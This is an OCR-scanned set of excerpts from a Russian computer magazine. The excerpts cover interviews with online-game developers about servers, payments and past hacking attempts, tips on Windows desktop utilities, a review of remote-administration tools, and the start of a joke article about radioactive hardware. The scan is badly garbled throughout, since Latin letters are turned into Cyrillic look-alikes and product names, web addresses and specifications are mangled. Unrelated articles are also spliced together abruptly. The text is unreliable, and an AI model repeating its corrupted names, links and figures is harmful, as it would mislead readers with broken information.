Зііепіѵѵогісі Ш была куплена лицензия, после 
чего игра Зііепі Мападег была адаптирована 
для России: собрана инфа по командам и иг- 
рокам РФПЛ, к движку был прикручен дизайн 
и тексты. Но все техническое оснащение, 
все программы и базы данных размещаются 
в Великобритании — в сети ОІоЬіх.пеі — и 
принадлежат компании Зііепіѵѵогісі. 



Сеть из бэкап-серверов каждый день 
бэкапит по 15 Гб инфы с каждой машины. 
Всего около терабайта. 

Маршрутизатор Саіаіузі 6500 от Сізсо сто- 
ит никак не меньше $16500. Обслужива- 
ет 700 000 уникальных запросов в сутки. 
За 24 часа выдает посетителям 3 000 000 
страниц и перекидывает более 90 000 000 
пакетов. Не машина, а настоящий зверь! 



В качестве ѵѵеЬ-серверов и серверов БД 
используются двухпроцессорные тачки с 
8 — 10Гб памяти. Всего около 150-ти машин 
(точное число часто меняется). 

Число серверов в системе не фиксирова- 
но и нагрузка распределяется между ними 
поровну. Выход одного сервера из строя 
никак не влияет на работоспособность 
системы. 
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РС_20ЫЕ 




ЫеѵегІ_апсІ5 

ѵѵѵѵѵѵ.пеѵегіапсіз.ги 



Тіте2его 

ѵѵѵѵѵѵТітегего.ги 



Территория 

ѵ\лллл/.іеггііогу.ги 



Несколько слов о создании игры. Как при- 
шла идея? Кто принимал участие в непос- 
редственной реализации? 

В конце лета 2004-го года пришла идея со- 
здать игру, в которую интересно было бы иг- 
рать прежде всего нам самим. На то время 
у нас уже были кое-какие идеи, основанные 
на личном опыте. Мы на себе испытали все 
достоинства и недостатки онлайн-игр, поэ- 
тому имели достаточно четкий план созда- 
ния своей. Как выяснилось, он был совер- 
шенно неверным. Все оказалось гораздо 
сложнее, чем мы могли предполагать. Но 
отступать было уже поздно. Так появил- 
ся домен пеѵегіапбз, на котором не было 
ничего, кроме форума, где обосновалась 
небольшая группа энтузиастов, которые 
помогали, чем могли. Но основную работу 
делали всего три человека, только один из 
которых был программистом. 

Каковы были первоначальные инвестиции 
в проект? Что является сейчас основным 
источником дохода? 

Первоначальные вложения в проект были 
примерно в размере 20-ти долларов. Имен- 
но столько стоила аренда домена. 

Затраты игроков на игру? Средние/макси- 
мальные? 

Затраты игроков наигру определяются пре- 
жде всего самими игроками. Большинство 
из них не тратят ни копейки. 

Как все технически устроено? 

Проект можно разделить на 3 основных 
блока: 

1 . Чат. 

2. Системные программы, которые посто- 
янно работают на сервере. Они отвечают за 
защиту от ботов, очистку системы, выдачу по- 
дарков наДень рождения и многое другое. 

3. Сама игра (верхний фрейм, весь игровой 
процесс обслуживается одним файлом с под- 
ключаемыми дополнительными модулями). 
Сколько серверов обсуживает игру, каковы 
их характеристики? 

В данный момент проект обслуживает 5 
серверов. Машины все двухпроцессорные, 
памяти минимум по 2 (ЗВ, РАЮ массив ЗСЗІ. 
Вылили попытки взлома 
и к чему они привели? 

Попытки взлома были. К чему-либо сущест- 
венному они не привели — небольшое время 
в роли администратора. Все взломы быстро 
устранялись. Система раньше была дырявая 
(серверная часть + инъекции в БД). Уже более 
полутора лет никаких подобных проблем не 
было. 



Несколько слов о создании игры. Как при- 
шла идея? Кто принимал участие в непос- 
редственной реализации? 

Идея создания проекта возникла осенью 
2003-го года. Нужна была игра, принципи- 
ально отличающаяся от существующих 
на рынке, онлайн-игра нового поколения. 
Хотелось сделать не обычный фэнтезий- 
ный проект с эльфами, а постатомный мир 
в духе РаІІоиІ, с десятками тысяч локаций, 
с мутантами и радиацией, с интересной бо- 
евой системой. 

Каковы были первоначальные инвестиции 
в проект? Что является основным источни- 
ком дохода сейчас? 

Во время создания игры инвестиции 
были относительно невелики (150 — 200 
тысяч долларов). Сейчас, чтобы создать 
проект такого уровня, потребуются за- 
траты минимум в 2 — 3 раза больше. Во- 
обще, проекты, подобные нашему, впол- 
не способны существовать на доходы от 
рекламы и ргосіисі ріасетепі. 

Затраты игроков на игру? Средние/макси- 
мальные? 

Для 70 — 75% игроков затраты на игру ог- 
раничиваются стоимостью интернет-свя- 
зи. Часть игроков, при желании, может 
потратить деньги на дополнительные сер- 
висы — на установку аватара или покупку 
ѴІР-клиента с расширенными игровыми 
возможностями. 

Система платежей. Каким образом Вы при- 
нимаете деньги от игроков? Существуют ли 
независимые организации (биржи, «бара- 
холки»), которые делают деньги с помощью 
Вашей игры? 

Сама компания Тіте2его не принимает де- 
ньги от игроков. Если говорить о черном 
рынке, то он существует, как и во многих 
других играх. Оборот незаконных сделок 
составляет не менее 4 — 5 тысяч долларов 
ежемесячно. Все это совершается либо в 
самой игре, либо через сайт Г еймлот и ему 
подобные. 

Сколько серверов обсуживает игру, како- 
вы их характеристики? 

Сейчас игру обслуживают 5 серверов, 
включая тестовый и резервный — 

2х ЭиаІ Іпіеі Хеоп НТ СРІІ 2.80СН2, 2х 
ОиаІ соге АІѴЮ Оріегоп 275 (2.2 (ЗНг). 

На данный момент этих мощностей до- 
статочно, и они нас полностью устраи- 
вают. В случае необходимости, конечно 
же, будем расширяться. 



Несколько слов о создании игры. Как при- 
шла идея? Кто принимал участие в непос- 
редственной реализации? 

Идея игры возникла более трех лет назад у 
трех геймеров. Именно тогда они вместе 
еще с целым рядом игроков были отлу- 
чены администрацией бойцовского клу- 
ба от любимой игрушки. Расстроенные 
игроки объединились и решили создать 
свою игру. Ну а дальше, как полагается, 
подсчитали финансы, собрали команду 
профессионалов — и работа закипела. 
Так и появилась «Территория». Игра была 
разработана менее чем за один год. На 
самом деле, это рекордно короткий срок 
для игры такого масштаба, как «Терри- 
тория». 

Система платежей. Каким образом Вы при- 
нимаете деньги от игроков? Существуют ли 
независимые организации (биржи, «бара- 
холки »), которые делают деньги с помощью 
Вашей игры? 

В игру интегрирована собственная сис- 
тема примема платежей — «Террабанк». 
Созданная нами система позволяет не 
тол ькооплачивать дополнительные игро- 
вые возможности, но и выводить деньги 
из игры. Система вывода реальных денег 
из игры впервые была успешно опробо- 
вана в «Территории«. Через «Террабанк« 
игрок может получить на руки деньги, за- 
работанные виртуальным способом. Для 
этого достаточно просто играть в игру, 
зарабатывать игровую валюту и менять 
ее на реальные деньги. Некоторые игро- 
ки «Территории» сегодня зарабатывают 
от$50 в неделю. Кстати, пополнять игро- 
вой счеттакже можно посредством ЗМЗ- 
сообщений. 

Затраты игроков на игру? 
Средние/максимальные? 

Бизнес-модель игры — условно-бесплат- 
ная. Это значит, что любой желающий мо- 
жет играть в «Территорию», не вкладывая ни 
копейки. За реальные деньги в игре можно 
купить эксклюзивные игровые вещи (арты) 
и дополнительные игровые возможности. 
Были ли попытки взлома 
и к чему они привели? 

Взломов не было, серьезных попыток — 
тоже. ЭоЗ-атаки случались, но в целом — 
ничего серьезного. 
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Улучшаем эргономику винды 



Удивительные ребята, эти автолюбители. 

Г отовы потратить все до копейки на всевозможные 
детальки, обещающие прибавить лошадок к мощнос- 
ти своего жеребца. Бывают и эстеты, они же — насто- 
ящие ценители внешнего вида автомобиля и удобства 
салона. А чем мы хуже? Удивительно, но то же самое 
применимо и для винды. Ее тоже можно сделать 
более удобной и эффективной, если прикрутить к ней 
несколько примочек. Итак, добро пожаловать 
в тюннинг-ателье от «Хакера» ! 



Сворачивай играючи 

Есть у меня одна вредная при- 
вычка: держать открытыми 
кучу ненужных окон. В панели 
задач — полный хаос: глаза 
мозолят названия десятка 
самых разнообразных окон, 
и с ходу найти нужное среди 
них практически нереально. 
Достало! К счастью, решение 
проблемы я уже нашел — им 
стала программа тіпіМІ2Е 
( ІіЦр://адиагіа. 2 а.пеІЛ . 

Эта чудненькая тулза 
перехватывает любое свора- 
чиваемое окно и размещает 
на экране его маленькую 
превьюшку, а на ней отоб- 
ражает иконку приложения. 

Т ы даже не представляешь, 
насколько это наглядно 
(впрочем, представлять не 
надо — смотри скриншот). 
Теперь, чтобы восстановить 
окно любого приложения, 
достаточно щелкнуть по его 
превьюшке на экране. При 
необходимости стройный 
ряд изображений можно раз- 
местить на переднем плане 
или же вывести на экран по 
нажатию горячей кнопки. 
Более того, тіпіМІ2Е имеет 
кучу всевозможных настроек. 
А значит, ты без труда смо- 
жешь изменить прозрачность 
изображений, их размеры 
и т.д. Короче говоря, очень 
продуманная вещь. 



Изящное переключение 

Каждый знает, что сочетание 
клавиш АІІ+ТаЬ позволяет 
быстро переключаться 
между приложениями. После 
нажатия заветной комбина- 
ции юзер получает окно, в 
котором красуются значки 
активных приложений, а 
также краткие подписи под 
каждым из них. Подобный 
принцип прекрасно рабо- 
тает, если у тебя запущено 
несколько приложений. Но 
если их становится все боль- 
ше и больше? Не хватает 
наглядности, и пользоваться 
переключением становится 
дико неудобно? Но этот 
недостаток можно легко 
исправить, установив тулзу 
Тазк Зѵѵіісіі ХР Рго ( ѵѵѵѵѵѵ. 
піѵѵіпсі.сот/іазкзѵѵіісііхр ). 
Прога использует привыч- 
ные комбинации клавиш и 
выводит похожее окно, но 
плюс ко всему отображает 
небольшой снимок прило- 
жения. Жмешь АІІ+ТаЬ, а 
там — скриншот окна. Сам 
понимаешь, насколько 
это удобно, если открыто 
несколько окон одного и того 
же приложения. Причем ты 
вправе настроить переклю- 
чение, как тебе вздумается. 
Тьма разнообразных настро- 
ек и свойств к твоим услугам. 



Правильный яиіскіаипсіі 

Ты никогда не задумывался, 
почему в панель быстрого за- 
пуска можно вставить только 
ярлыки на запуск приложения 
или открытия папки? А почему, 
например, нельзя создать там 
группу ярлыков, с выпада- 
ющим меню? Чтобы можно 
было раскидать программы по 
группам — Интернет, офис, 
программирование и т.д., — 
а потом, щелкнув по нужной 
иконке, выбрать и само 
приложение? А все это идет от 
лени разработчиков МісгозоТС. 
К счастью, прога Т ше БаипсИ 
Ваг ( ѵѵѵѵѵѵ.ІгиеІаипсІпЬаг. 
сот ) это безобразие разом 
разрулит. После установки ты 
не только сможешь организо- 
вать ярлыки по группам, но и 
всячески изменять внешний 
вид риіскІаипсИ’а до неузнава- 
емости, в том числе и при по- 
мощи скинов. Особенно хочу 
отметить поддержку плагинов, 
позволяющих наглядно раз- 
местить в панели задач самые 
разнообразные панельки: 
прогноз погоды, индикатор 
батареи ноутбука, командную 
строку, кнопки для быстрого 
управления проигрывателем 
и многое-многое другое ( ѵѵѵѵѵѵ. 
ІгиеІаипсНЬаг.сот/рІиаіпз/ 
іпбех.іі(ті ). В общем, посмот- 
ри на скриншоты, чтобы все 
окончательно стало ясно. 



После 






После 
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Мы ѵмышлѳно обошли сто- 
роной вопрос об украшении 
интерфейса винды. Хочешь 
модный интерфейс и кучу 
наворотов в придачу? Читай 
статью «Красиво жить не за- 
претишь» (ѵѵѵѵѵѵ.хакер.ги/іосаі/ 
гесНгесІазр?игІ=/тааа 2 іпе/ 
ха/061 /042/1 .азЫ. 



оѵо 



Все представленные в статье 
программы и дополнительный 
стафф к ним ты обязательно 
найдешь на нашем РУР. 




Я сказал «мухой»! 

В любой мало-мальски 
продвинутой среде про- 
граммирования есть такая 
замечательная функция, как 
автодополнение слов. От 
программиста не требуется 
набирать сложные названия 
функций — среда по первым 
буквам слова сама пытается 
определить название функ- 
ции и предлагает варианты. 
Таким образом, экономится 
масса времени, а многие 
функции можно просто не 
запоминать. Разработчикам 
программы ІпІеІІіСотрІеІе 
( ѵѵѵѵѵѵ.ЯазІіреак.сот/ісотр ') 
и этого показалось недоста- 
точно. Ребята реализовали 
функцию автодополнения на 
глобальном уровне, причем 
не только имен функций 
в программировании, но 
и обычных, вполне чело- 
веческих слов. Эта прога 
не зависит от какого-то 
конкретного приложения 
и обеспечивает функции 
автодополнения слов везде, 
в любой программе! Просто 
набираешь начало слова, 
а всплывающее окошко 
предлагает варианты 
окончания. Вдвойне приятно, 
что на сайте разработчика 
доступны словари. Впрочем, 
ты все равно найдешь их на 
нашем диске. 



Один — хорошо, 
а много — лучше 

В борьбе за простор рабочего 
пространства разработчики 
І_іпих пошли на один очень 
простой, но хитрый ход. Вмес- 
то одного рабочего стола они 
предложили использовать 
несколько, при необходи- 
мости переключаясь между 
ними. Поначалу это кажется 
немного неудобным, но через 
некоторое время, когда на- 
конец-то проникнешься этой 
идеей, начинаешь понимать, 
что ничего более удобного и 
придумать нельзя. На одном 
рабочем столе находятся 
окна запущенных для работы 
программ, на другом — аська 
и ирка. В момент избавля- 
ешься от соблазна войти в 
чат и написать пару-трой- 
ку (умножаем на десять) 
сообщений. И это лишь одно 
из применений. Например, в 
офисе легко можно переклю- 
чаться из Оиаке’а на десктоп 
с запущенной ѴізиаІ Зіисііо. 
Круто? А то! 

Кстати, чуть не забыл. Все 
эти прелести предоставляет 
программа СЫтега Ѵігіиаі 
Эезкіор ( ѵѵѵѵѵѵ.сііітега. 
Іиі/ѵігіиаІ сіезкіор ). С такой 
байдой ты можешь заполучить 
сразу 9 разных десктопов 
с возможностью переклю- 
чаться из одного в другой по 
одному щелчку мыши. 



На помощь графоману 

Врожденной грамотностью 
могут похвастаться далеко 
не все: у меня вот, например, 
ее никогда не было. Поэтому, 
чтобы проверить текст на 
ошибки, я традиционно копи- 
рую его в ѴѴогб и лишь потом 
вставляю его куда следует. 
Метод жутко неудобный, но 
зато эффективный. Пос- 
меявшись над подобными 
извращениями, мой хороший 
товарищ порекомендовал 
использовать утилиту ЗреІІ 
СИескег ( ѵѵѵѵѵѵ. зреІІ. сот, щ ). 
Штука оказалась исклю- 
чительно полезной. По 
сути, это система сквозной 
проверки орфографии. Она 
знает более 23-х языков и, что 
самое главное, не зависит, 
от какого-либо приложения. 
ЗреІІ СІіескег может работать 
везде! Находясь постоянно в 
памяти, она отслеживает на- 
бираемый текст и проверяет 
его правильность, либо ана- 
лизирует содержимое буфера 
обмена. Если слово набрано 
неправильно, то она тут же 
укажет на ошибку в указанном 
месте экрана. В настройках 
программы это место легко 
переопределяется, каки 
время, в течение которого 
сообщение будет на экране. 
Кроме того, появление слова 
с ошибкой можно сопровож- 
дать звуковым сигналом. 




Иллюстртор Родион Китаев 
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Вездесущий 



Системы удаленного доступа для ѴѴІпсІслл/з 





Администрировать сеть, пускай даже самую маленькую, непросто. Чтобы облегчить ка- 
торжный труд админов, существует масса вспомогательных утилит. Без многих из них 
можно обойтись. Но что по-настоящему нужно, так это средство для удаленного админис- 
трирования. Каждый подбирает его под себя, и сегодня, знаешь ли, твоя очередь! 
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За бортом этого обзора осталось несколько нѳ мѳнѳѳ интерес- 
ных продуктов. Если тѳбя что-то нѳ устроило в представленных 
программах, то попытай счастье с этими. 



Не гасішіп’ом единым 

Конечно, ты можешь продолжать пользоваться Петоіе Асітіпізігаіог’ом (он же Васітіп), 
считая его возможности достаточными. Но меня терзают сомнения, что ты даже не по- 
дозреваешь о существовании отличных альтернативных продуктов для удаленного ад- 
министрирования. Скажу больше: каждый из пакетов, представленных в обзоре, достоин 
отдельной статьи, с подробным описанием всевозможных способов его применения. Но 
мне, увы, придется остановиться лишь на ключевых моментах. 

Вообще, все утилиты, найденные мной в Сети, можно разделить на две категории: 

1. Те, которые по своим возможностям близки кѴѴіпбоѵѵз Ветоіе Оезкіор. То есть предо- 
ставляют интерфейс, позволяющий работать на удаленной машине как за своим собс- 
твенным компьютером. К этой категории относятся утилиты ѴІ\ІС, СоТоМуРС и ТітЬикіи. 
О первой из них мы уже говорили много раз, поэтому не будем повторяться. А вот две 
остальные заслуживают самого пристального внимания. 

2. И программы, имеющие более широкий круг возможностей. Они предназначены для ад- 
минов больших сетей, где одного лишь «удаленного экрана» недостаточно. В состав вхо- 
дит масса вспомогательных утилит на все случаи жизни: рсАпуѵѵбеге, РетоІеІуАпуѵѵИеге 
и ЫеЮр Ветоіе СопігоІ. 




КетоіеІуАпуѵѵеге 7 
Зат І_аЬ8 ІЛсІ 
ѵѵѵѵѵѵ.ЗатІаЬз.сот 



Начнем с ВетоіеІуАпуѵѵеге. Об исключи- 
тельной серьезности этого приложения 
можно судить уже по списку возможностей 
на официальном сайте. Если тебе требует- 
ся непрерывно следить за производитель- 
ностью на удаленной машине, изменять ее 
настройки, работать со службой каталогов 
(Асііѵе Оігесіогу), отслеживать происходя- 
щие события и использовать командный ин- 
терпретатор вкупе со скриптовым языком, 
то не сомневайся, — эта программа для тебя. 

Принцип работы пакета элегантен и 
прост: после инсталляции сервера на це- 
левой системе открывается доступ к ѵѵеЬ- 



интерфейсу, напичканному специальными 
^ѵа-аплетами. Далее все операции будут 
осуществляться только через него. Таким 
образом, решается одна из наиболее рас- 
пространенных проблем — необходимость 
специального программного клиента. В 
случае с ВетоіеІуАпуѵѵеге, админить уда- 
ленный комп можно практически отовсюду, 
где есть ѴѴеЬ-браузер с поддержкой иаѵа. 
Неважно, будь то офис, институт, интер- 
нет-кафе или удобное домашнее кресло у 
камина. При определенном желании доступ 
к веб-морде можно получить с экрана смар- 
тфона и РоскеіРС, и это тоже не может не 
радовать. Кстати, для РЭА с беспроводной 
связью вообще предоставляются особен- 
ные возможности. 

После подключения к веб-интерфейсу 
админ немедленно получает доступ к так 
называемой Зузіет ОазИЬоагб. Это спе- 
циальная панель, на которой отображена 
вся информация о серверной машине, в 
том числе данные о доступных ресурсах, 
загрузке процессора, сетевых настройках 
и активности, запущенных процессах (со 
списком привязанных к ним ЭІ_І_-библио- 
тек) и даже установленных ИоІІіхез’ах. Ра- 




ботать с удаленным рабочим столом через 
ВетоіеІуАпуѵѵеге — одно удовольствие. Я не 
преувеличиваю. Разрешение на удаленной 
машине автоматически подгоняется под 
клиента. Таким образом, доступен полный 
экран, а не его крохотная часть со скрол- 
лингом. Глубину цвета возможно изменить 
на лету, улучшая картинку или, наоборот, 
уменьшая сетевой трафик в зависимости от 
конкретной ситуации. Особенно порадова- 
ло автоматическое дублирование данных 
из буфера обмена клиентской и серверной 
машин. В Вабтіп’е без этой фишки рабо- 
тать просто невыносимо. 

Среди огромного количества незна- 
чительных, но весьма полезных функ- 
ций хочу выделить встроенные РТР- и 
ЗЗН-серверы. Да-да, виндовый ЗЗН-сер- 
вер и визуальное средство для удаленно- 
го администрирования в одном флаконе 
— это действительно мощно. Доступ ко 
всем этим прелестям легко лимитируется. 
Для этого ВетоіеІуАпуѵѵеге поддерживает 
аутентификацию в ЫТ-домене, блокировку 
по ІР-адресам. А для сохранности данных 
используется ЗЗН- и ЗЗІ_-шифрование. 
Словом, с безопасностью все в порядке. И 
со всем остальным — тоже. 

Идеально для администрирования сервера 
или мэйнфрейма 



ЫеЮр Петоіе СопігоІ 8.0 
Сго5$Тес Согр. 
ѵѵѵѵѵѵ.сгоззіессогр.сот 



Настоящий монстр. С широчайшим набо- 
ром возможностей. Он будет незаменимым 
инструментом для администратора. И в осо- 
бенности для тех, кому приходится рулить 
большим количеством клиентских машин, 
одновременно предоставляя техподдержку 
пользователям. 

Схема простая. ЫеЮр Ретоіе Сопітоі 
состоит из двух основных модулей: Нозі и 
СиезГ Нозі устанавливается на компьюте- 
рах, которые нужно удаленно админист- 
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На диске ты найдешь програм- 
мы. описанные в этой статье. 



рировать, а модуль (Зиезі — на машину, с 
которой будет осуществляться дальней- 
шее управление. За безопасность системы 
отвечает специальный модуль — Зесигііу 
Зегѵег. В его задачи входит аутентифика- 
ция пользователей сети на основе Асііѵе 
Эігесіогу, доменов ѴѴіпбоѵѵз ЫТ, а также 
фирменных технологий компании ЫеЮр. 

Пакет выделяется среди своих конку- 
рентов за счет богатого разнообразия 
платформ, на которые можно установить 
сервер. Это и все версии ѴѴіпбоѵѵз, включая 
ѴѴіпбоѵѵз СЕ, 03/2, Мае 03 X, І_іпих и даже 
мобильная платформа ЗутЬіап. Причем 
возможна параллельная установка серве- 
ра на несколько машин с помощью ІМеЮр’з 
Эеріоутепі: ІЛіІіІу. Клиентская часть ЫеЮр 
Ветоіе Сопігоі также существует под все 
мыслимые и немыслимые платформы. Кро- 
ме всего прочего, в ЫеЮр есть некое подо- 
бие ѵѵеЬ-интерфейса ЯетоіеІуАпуѵѵИеге, 
которое работает через АсйѵеХ-расши- 
рение. Прямо скажу: такое разнообразие 
впечатляет. 

Удобный интерфейс позволяет быстро 
подключиться к любой машине, на которой 
установлена серверная часть. Причем в 
Ветоіе СопігоІ существует продвинутое 
средство для создания сценариев — в буду- 
щем это позволит автоматизировать массу 
рутинных действий. При желании сеанс с 
сервером можно записать, например, для 
создания ролика ѴізиаІ Наск++ . 

Я не зря упомянул о поддержке пользо- 
вателей. В распоряжении бедолаг входит 
кнопка 303. Таким образом, можно быст- 
ро запросить помощь у администратора, 
указав на суть проблемы. Если доведется 
следить за сохранностью оборудования, то 
особенно пригодится функция инвентари- 
зации. Она обеспечивает сбор информа- 
ции об установленном аппаратном и про- 
граммном обеспечении пользовательских 
компьютеров. Быстро и эффективно! 

Идеально для обслуживания большого пар- 
ка разнообразных машин и техподдержки 
пользователей 



8утапІес рсАпу ѵѵііеге 1 2.0 
§утап(ес 

ѵѵѵѵѵѵ.зутапіес.сот/рсапуѵѵііеге 



Зутапіес рсАпуѵѵбеге — это, по сути, кор- 
поративный стандарт для крупных забугор- 
ных контор. Сканируя буржуйские подсети, 
я нередко замечал открытые порты, при- 
сущие этому приложению. Последующий 
анализ фингерпринтов лишь подтверждал 
мои предположения: это действительно 
рсАпуѵѵаге. 

Серверная часть пакета может быть 
установлена на всех популярных платфор- 
мах: ѴѴіпбоѵѵз, І_іпих и Мае 03 X. При этом 




подключиться к ней будет возможно даже 
с РоскеіРС. Основной упор сделан именно 
на функцию удаленного рабочего стола. 
В каждом конкретном случае прога сама 
сделает изображение качественным, ис- 
ходя из характеристик канала связи. Есть в 
арсенале Зутапіес рсАпуѵѵбеге и система 
для крупномасштабного развертывания, и 
возможность записи сеанса для последу- 
ющего воспроизведения. А вот с автома- 
тизацией и сценариями здесь дела плохи: 
возможности ограничиваются выполнени- 
ем команд при запуске или инициализации 
соединения. 

Для каждого подключения менеджер 
рсАпуѵѵИеге создает отдельный удобный 
профиль с индивидуальными настройками. 
А для удобства работы с несколькими сер- 
верами все активные сессии размещаются 
во вкладках одного окна. 

Что касается передачи файлов, то 
она организована с помощью удобного 
бгад’п’бгор. Просто перетащи файлы меж- 
ду хостом и гостевой машиной — и все. 
Такая штука очень удобна при переносе 
файлов с одной платформы на другую. Не 
нужно заморачиваться с ЗатЬ’ой и прочими 
трудными в настройке вещами. 

Если безопасность для тебя очень важ- 
на, то рсАпуѵѵИеге тебя не разочарует. Па- 
кет поддерживает стойкое шифрование, 
ограничение количества попыток ввода 
паролей, авторизацию пользователей в 
КІТ-домене, Асііѵе Эігесіогу и ЮАР. Хотя по 
умолчанию рсАпуѵѵбеге не поддерживает 
симметричное шифрование и шифрование 
на основе открытых ключей, все это можно 
легко настроить вручную, затратив не боль- 
ше минуты. Но если и этого тебе недоста- 
точно, то обрати внимание на появившуюся 
в последних версиях специализированную 
утилиту оценки рисков различных вариан- 
тов подключений. 

Идеально для большой корпоративной сети 



Ехрегісііу СоТоМуРС 5.0 
Е-оІе Ноісііпдз 
ѵѵѵѵѵѵ.ехрегіеііу.еот 



Универсальных солдат с нас, пожалуй, 
хватит. Предлагаю рассмотреть что-ни- 
будь более простое и прозаичное. В этом 
плане хорошо показала себя программа 
Ехрегісііу ОоТоМуРС РегзопаІ (далее прос- 
то (ЗТМРС). ОТМРС устанавливается на 
удаленную машину как системная служба и 
далее предоставляет гостевой вход через 
веб-интерфейс (для этого используются 
АсІіѵеХ-расширения или баѵа-апплеты в 
зависимости от используемой операцион- 
ной системы). Ты сможешь подключиться 
к серверу из любой точки мира. Этому спо- 
собствует уникальная работа всей системы 
в целом. Для каждого пользователя на сай- 
те Ехрегсііу доступна собственная панель 
управления. Чтобы установить серверную 
часть на какой-нибудь компьютер, необхо- 
димо зайти в эту панель и отдать соответс- 
твующее распоряжение. После этого ты 
получишь письмо с ссылкой на серверную 
часть для нового компьютера. Повторив 
действия для всех остальных хостов, в па- 
нели управления ты получишь список всех 
установленных серверов. К каждому из них 
ты сможешь присоединиться прямо из окна 
своего браузера! 

Такой подход применим исключительно 
для компьютеров, подключенных к глобаль- 
ной Сети . Но зато какое изящество ! Т ебе не 
только не нужен клиент — ты можешь под- 
ключаться к серверу из-под любой опера- 
ционной системы! И делать это абсолютно 
безопасно, поскольку разработчики по- 
заботились о защищенности соединений. 
Поток данных между машинами пуленеп- 
робиваем. Он защищен двумя уровнями па- 
ролей и 128-ми битным АЕЗ-шифрованием 
налету. Доступ к ѵѵеЬ-серверу осуществля- 
ется с использованием ЗЗІ_-соединения. 



034 



ХАКЕР 05 /89/ 06 




Этот забавный КетоЕе ЭезкЕор 

Встроенная в винду тулза для 
удаленного администрирования 
неплоха. Но эффективность ее 
использования можно увеличить, 
если знать о КетоЕе ЭезкЕор 
несколько фишек: 

1 . Работая под виндой, подсоеди- 
ниться к удаленном серверу не 
проблема. Нужно лишь запустить 
стандартную программу «Удален- 
ный доступ к рабочему столу» . 
Под никсами подобной фишки 
по умолчанию нет, поэтому 
придется самостоятельно загру- 
зить программу гйезНор (\ѵ\ѵ\ѵ. 
гйезкиор.ог^ ). Тулза бесплатна и 
легко устанавливается на любой 
системе с настроенными иксами. 
Теперь можешь рулить виндой 
прямо из-под пингвина. 



К плюсам также можно отнести удобство 
работы через межсетевые экраны. Ввиду 
того, что удаленная машина (ЗТМРС сама 
инициирует подключения, тебе нет необхо- 
димости специально настраивать файрвол 
для доступа. 

Представляешь, какие возможности пре- 
доставляет (ЗоТоМуРС для разработчиков 
троянов? Отныне не нужно даже заниматься 
модулем для визуального управления. 

Идеально для администрирования удален- 
ных серверов в Интернете 



Меіоріа ТітЬикІи Рго 8.6 
Сотриіегз ІІпІітііесІ 
ѵѵшѵѵ.пеіоріа.сот 

Еще один претендент название самой прос- 
той утилиты данного класса. Например, 
адрес удаленной машины обычно вводят 
вручную. ЫеІоріаТітЬикШ позволяет найти 
нужный хост посредством специального 
1_0АР-сервера, установленного в твоей 
сети. Это уже совершенно другие возмож- 
ности: для поиска достаточно знать часть 
имени юзера или любые другие его данные. 
Кроме этого, программаподдерживаетпро- 
фили, в которых задаются параметры под- 
ключения для каждой отдельной машины. 

Для того чтобы чувствовать себя в безо- 
пасности, рекомендуется включить шиф- 
рование и компрессиютрафикас помощью 
83Н — это экономично. Программой не 
возбраняется изменение параметров под- 
ключения. Прямо во время активной сессии 
можно поменять глубину цвета или любые 
другие параметры. 

Серверную часть приложения можно 
заинсталлить дистанционно на ѴѴіпбоѵѵз 
І\ІТ 2000 и 2003, с помощью простой кон- 
сольной утилиты и сразу регламентировать 



параметры доступа, обозначив имена поль- 
зователей и хосты, которым разрешено 
подключение. 

Интерфейс клиентского окна может пока- 
заться немного устаревшим. Но зато ка- 
кая простота! Не нужно долго думать, куда 
нажать, как это было в случае с гигантами 
ПетоіеІуАпуѵѵеге и ІМеЮр Петоіе СопДоІ. 
А это большой плюс, если иногда нужно 
просто подключиться и поправить что-то 
наудаленной машине. 

Но это еще не все. Последняя версия 
ТітЬ-икЮ способна работать как надстрой- 
ка для Зкуре, самого популярного клиента 
для ѴоІР-телефонии. Такого мы еще не ви- 
дели! Дело в том, что программисты Зкуре 
разработали свои собственные протоколы 
для передачи данных. А эти протоколы — 
просто сказка. Во-первых, им не страшны 
ни роутеры, ни файрволы, ни І\ІАТ — пакеты 
успешно пройдут через все препятствия. 
А во-вторых, передача осуществляется с 
жестким шифрованием данных на лету, 
поэтому ни один байт не уйдет на сторону. 
Установив ТітЬикІи, клиенты смогут легко 
соединяться друг с другом прямо из кон- 
такт-листа Зкуре. Один клик — и ты уже под- 
соединен к удаленному рабочему столу. 

Идеально для администрирования хостов, 
спрятанных за файрволами и ІМАТ’ом. 

Выбор за тобой 

Конечно, это далеко не полный набор 
средств для удаленного администрирова- 
ния. Но я постарался найти такие утилиты, 
которые удастся заюзать в самых разно- 
образных ситуациях. Просто прикинь, в 
каких обстоятельствах тебе придется ра- 
ботать, и выбирай. Мои комментарии тебе 
в помощь, ос 



2. Серверные версии винды 
оснащены службой термина- 
лов. Это позволяет принимать 
сразу несколько подключений 
к системе. Беднягу ХР, как ОС 
для рабочей станции, такой 
службой обделили. Зато народ- 
ные умельцы быстро сваргани- 
ли специальную программу- 
патч, обещающую восстановить 
справедливость. 

На сайте Ьшр : //йее.ра^ез . 
аЕ/ аптѵра/ ОгЬег/Т егтіпаізе 
гѵегНоКезіігРаЕсЬ- 1 - 1 / ты смо- 
жешь найти как сам патч, так и 
его исходники. С программой 
идет неплохой мануал по уста- 
новке, который тебе поможет. 
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Радиоактивная картонка низкого разрешения 
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РІиТопіит 

Плутоний 



РАДИАЦИЯ — ДЕТЯМ НЕ ИГРУШКИ. ХЕРОСИМА, ЧЕРНОБЫЛЬ, ЧЕРЕПАШКИ НИН- 
ЗЯ И ЛЕЙКЕМИЯ — ВОТ ЧТО БЫВАЕТ, КОГДА ЛИШНЯЯ ПАРА КИЛОГРАММОВ 
ОРУЖЕЙНОГО ПЛУТОНИЯ ПОПАДАЕТ НЕ В ТЕ РУКИ. У НАШЕГО ПРИЯТЕЛЯ ГЕНРИ 
ШЕППАРДА НА ЭТОТ СЧЕТ ЕСТЬ ДРУГОЕ МНЕНИЕ. НЕСМОТРЯ НА КУЧУ УГРОЗ СО 
СТОРОНЫ СПЕЦИАЛИСТОВ, МАГАТЭ И СОВБЕЗА ООН, ОН ВСЕ ЖЕ РАЗДОБЫЛ 
КУСОЧЕК ЯДЕРНОЙ БОЕГОЛОВКИ, ПОТЕР ЕЕ НАТЕРОЧКЕ И ИЗГОТОВИЛ РА- 
ДИОАКТИВНУЮ КАРТОНКУ, КОТОРУЮ ТЕПЕРЬ ПЫТАЕТСЯ ПРОДАТЬ ПОД ВИДОМ 
МОНИТОРА НА МИТИНСКОМ РАДИОРЫНКЕ. 



«Тяжелая физика», которая связана, в первую очередь, с легкими 
частицами, как правило, вызываету новичка страх. Загадочные на- 
звания, неудобоваримые правила сведения формул и совершенно 
